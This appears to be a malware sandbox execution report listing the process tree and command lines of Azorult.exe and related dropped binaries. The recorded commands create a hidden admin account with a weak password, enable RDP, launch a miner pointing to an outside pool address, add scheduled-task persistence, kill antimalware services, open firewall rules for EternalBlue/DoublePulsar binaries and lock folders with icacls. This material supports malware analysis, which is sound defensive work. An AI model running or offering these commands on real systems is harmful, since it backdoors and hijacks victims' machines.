- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff825464f50,0x7ff825464f60,0x7ff825464f702⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.0.390697247\1251885658" -parentBuildID 20200403170909 -prefsHandle 1560 -prefMapHandle 1552 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 1652 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.3.13996710\1409351736" -childID 1 -isForBrowser -prefsHandle 2232 -prefMapHandle 1832 -prefsLen 122 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 2276 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.13.1459489169\1945926767" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3420 -prefsLen 6979 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 3436 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.20.1487890511\912837595" -childID 3 -isForBrowser -prefsHandle 3884 -prefMapHandle 3996 -prefsLen 7684 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 4028 tab3⤵
-
C:\Program Files\Mozilla Firefox\uninstall\helper.exe"C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppUser3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B7D4.tmp\B7E4.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU_INK --donate-level=1 -k -t15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
